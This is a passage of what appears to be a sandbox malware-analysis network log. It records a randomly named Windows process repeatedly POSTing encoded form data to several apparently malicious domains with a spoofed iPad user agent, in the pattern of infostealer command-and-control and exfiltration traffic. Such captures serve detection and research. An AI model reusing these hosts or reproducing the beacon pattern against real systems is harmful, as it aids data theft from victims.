                                                                  Oct 7, 2024 10:39:16.850478888 CEST | 522 | OUT | GET /zkan/?EZ2lo=6ZAT3xIn5pUb7db/tro8oHOZJyMtHS049C+OqD69Fiv/T4rqyATbhBxWGTJ8nzJFC6ZuCLeYMeRBfErXdr+6Npf/MiZpvdt0v4GFRoEaqN4q8s+9XQ==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:17.791733980 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:17 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:17.791762114 CEST | 431 | IN
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.10 | 49989 | 62.149.128.40 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:22.895766020 CEST | 794 | OUT | POST /vv4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  Origin: http://www.chalet-tofane.net
                                                                  Referer: http://www.chalet-tofane.net/vv4m/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=VFFDD1wAtLTltLS47C1exAtT+hHTXdBU+zT+AvdeEtYx+iG1Vx+KpxputkOylgoAZ28UJp0VfleYJpEFGVmBPai17ZS2BohN6E4LXcu7yzIavE5h/5tPjiluFT5TYtfJpw0NlDnePjppBu4UIqBzUOLnk3B/TpTtyD2X/0lf9t0466AH+RjiWLTdV8q7
                                                                  Oct 7, 2024 10:39:23.554140091 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:21 GMT
                                                                  Connection: close
                                                                  Content-Length: 4953
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                  Oct 7, 2024 10:39:23.554162025 CEST | 1236 | IN
                                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                  Oct 7, 2024 10:39:23.554178953 CEST | 1236 | IN
                                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                  Oct 7, 2024 10:39:23.554233074 CEST | 1236 | IN
                                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                  Oct 7, 2024 10:39:23.554246902 CEST | 228 | IN
                                                                  Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  14 | 192.168.2.10 | 49990 | 62.149.128.40 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:25.454433918 CEST | 818 | OUT | POST /vv4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  Origin: http://www.chalet-tofane.net
                                                                  Referer: http://www.chalet-tofane.net/vv4m/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=VFFDD1wAtLTltvW49hte5AshnhHTNtBQ+zf+AqkBHf8x+D21SECKsxpuiEOr6QptZ2BnJrgVfl6YJp0FGmeGJKi3iJSOMIhN6E4LXcKRyzQavw9h/YtQuClpTD5TSNfVpw0rlC74Pm1pBsQUIbBwbOLhpXBpSJKqrTmcy35B8v4r5bhAvAC1F8PTb6fRbATh0O+crTrMEkAa+mpm/A==
                                                                  Oct 7, 2024 10:39:26.122329950 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:24 GMT
                                                                  Connection: close
                                                                  Content-Length: 4953


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  15 | 192.168.2.10 | 49991 | 62.149.128.40 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:27.993264914 CEST | 1831 | OUT | POST /vv4m/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  Origin: http://www.chalet-tofane.net
                                                                  Referer: http://www.chalet-tofane.net/vv4m/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:28.656227112 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:27 GMT
                                                                  Connection: close
                                                                  Content-Length: 4953


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  16 | 192.168.2.10 | 49992 | 62.149.128.40 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:30.538971901 CEST | 520 | OUT | GET /vv4m/?7NP=7FXXUPl&EZ2lo=YHtjADYkxu7EjL2CugAOyFkd+FKjIe5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.chalet-tofane.net
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:31.200469017 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Mon, 07 Oct 2024 08:39:29 GMT
                                                                  Connection: close
                                                                  Content-Length: 5092


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  17 | 192.168.2.10 | 49993 | 45.130.41.13 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:44.430542946 CEST | 785 | OUT | POST /avd1/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  Origin: http://www.federall.store
                                                                  Referer: http://www.federall.store/avd1/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=Ackij+btrTbeUD1STq2KAEfW2dGcbn+RuRepTVMMb/S7J0xLiNffD7mPSfK1Q0DHf5aal/1a/v7xq7UfbxEnk1kmL6qFukmIfhMMu130xzK7znTvosJXYtha1PDmKyhg6LDbED1PZKaj2sGefoksrsJOlpBZURGEZxxjWDZmCMf+sqodyNSkZp47R94f
                                                                  Oct 7, 2024 10:39:45.159245014 CEST | 478 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:44 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  18 | 192.168.2.10 | 49994 | 45.130.41.13 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:46.980232954 CEST | 809 | OUT | POST /avd1/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  Origin: http://www.federall.store
                                                                  Referer: http://www.federall.store/avd1/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=Ackij+btrTbeUgtSVJeKIEfZ69GcV3/5uRSpTR0cbs27KVtLjIrfKrmPKvK0dUD2f5WSl6da/pXxq+wfbAEg2VkoHaqDqkmIfhMMu0HOxzC7z3DvqNJUQNhZ8vDmBSgr6LCrEBBlZMWj2ueeOdQvlsJIhpASfSmMeB9gWBNFXOD8irJajczzKek1f7N14nXfn1dXiYcmfKenHkyoxw==
                                                                  Oct 7, 2024 10:39:47.713430882 CEST | 478 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:47 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  19 | 192.168.2.10 | 49995 | 45.130.41.13 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:49.531136036 CEST | 1822 | OUT | POST /avd1/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  Origin: http://www.federall.store
                                                                  Referer: http://www.federall.store/avd1/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:50.287682056 CEST | 478 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:50 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.10 | 49996 | 45.130.41.13 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:52.071204901 CEST | 517 | OUT | GET /avd1/?EZ2lo=NeMCgL3W9jbBcF5QBI+xC2/C0rmOR2XSlRqEEw8EMM6ZBEMSksCLPJavXevPRkfiV5XKnMhO9JLxspMiSypcmF8IFrr+/UGmTQZVyy/nwgawwG6yzQ==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.federall.store
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:52.807353973 CEST | 481 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx-reuseport/1.21.1
                                                                  Date: Mon, 07 Oct 2024 08:39:52 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 278
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.federall.store Port 80</address></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  21 | 192.168.2.10 | 49997 | 3.33.130.190 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:39:57.890269041 CEST | 788 | OUT | POST /gbk4/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  Origin: http://www.mivasectomy.net
                                                                  Referer: http://www.mivasectomy.net/gbk4/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=imiSLmMqSxl2ULTtFGyS5BEl0ag0e8InIphsbLLoz7++61DAs0Ya4X1oQfqivkTlNqmgsDMqmhczqOSc+2BqNnMCrX41/0lDULvJ1ycPPjMnvDbEvyxTdmYBM2G+Pg3Qu2tQaCMh5fdePk6BL+ZWWceFh1ooUhVNw86RnDipWgP0lo4BYjDYZYfhjnJc


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  22 | 192.168.2.10 | 49998 | 3.33.130.190 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:00.460304976 CEST | 812 | OUT | POST /gbk4/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  Origin: http://www.mivasectomy.net
                                                                  Referer: http://www.mivasectomy.net/gbk4/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=imiSLmMqSxl2G4LtGlaSxBEm76g0VcI7IptsbOzCzNO+/kzAt28a5X1oIPqt3ETYNqqCsGMqmhIzqLWc+HBtP3MAtX4z70lDULvJ1yJqPjEnvyrEsTxQQGYAbGG+Lg3qu2t2aDhp5btePhGBLvZVDMeHl1o5Sk5C3uSatD6CCRTEmJZGJyiPKvDvth82DTiwyXNqs9Bn5Qb7YD1JIg==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  23 | 192.168.2.10 | 49999 | 3.33.130.190 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:03.056168079 CEST | 1825 | OUT | POST /gbk4/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  Origin: http://www.mivasectomy.net
                                                                  Referer: http://www.mivasectomy.net/gbk4/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=[TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  24 | 192.168.2.10 | 50000 | 3.33.130.190 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:05.600244045 CEST | 518 | OUT | GET /gbk4/?EZ2lo=vkKyIW0tFglfe9bmeE+ByzsP8tU/YNgfJJINKebc7ayTo2CGj2Bmv1A0Nfus+XH8P5LArwMekXdWm5WC/1gWFlJYtj1QuGdjZIz6/BBdIThi9XPOug==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.mivasectomy.net
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:08.992609978 CEST | 389 | IN | HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 07 Oct 2024 08:40:08 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 249
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EZ2lo=vkKyIW0tFglfe9bmeE+ByzsP8tU/YNgfJJINKebc7ayTo2CGj2Bmv1A0Nfus+XH8P5LArwMekXdWm5WC/1gWFlJYtj1QuGdjZIz6/BBdIThi9XPOug==&7NP=7FXXUPl"}</script></head></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  25 | 192.168.2.10 | 50001 | 203.175.9.128 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:17.397810936 CEST | 782 | OUT | POST /ztx6/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  Origin: http://www.animekuid.xyz
                                                                  Referer: http://www.animekuid.xyz/ztx6/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=Gcy3C6E8i7408YidJV2UGaTCMeH0gL6AP7oesLsv3MW9Y9MvIotxfq85PHWzqPi1YCVFaZU5FPp+jKKwJCtUxzwHcBlewNND+lpqC+kn4iLEBgQL8LOQoAW/IyuXp443ylOh2O1FPRKWJXGBZpgeux3EXTn9iyjDQt/dpZkXFJS0w8zA5EUMYPuLGpjf


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  26 | 192.168.2.10 | 50002 | 203.175.9.128 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:19.947967052 CEST | 806 | OUT | POST /ztx6/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  Origin: http://www.animekuid.xyz
                                                                  Referer: http://www.animekuid.xyz/ztx6/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=Gcy3C6E8i74064Sda1KUA6TBD+H0pr6cP70esKpq2+y9YYovLqJxaq85HnX4uPiuYCR3abw5FP9+jK6wJxFTzjwZThlc+tND+lpqC+wd4h7EAVYL8uyXpAWwBSuX+o4zylPE2LdvPTyWJVeBa4gd3h3CaznqpwGma8THvZkFcfGJ3dSHoV1bL4yFIvW1ijCjh+7jQmoXKQs63sexdg==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  27 | 192.168.2.10 | 50003 | 203.175.9.128 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:22.496325016 CEST | 1819 | OUT | POST /ztx6/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  Origin: http://www.animekuid.xyz
                                                                  Referer: http://www.animekuid.xyz/ztx6/
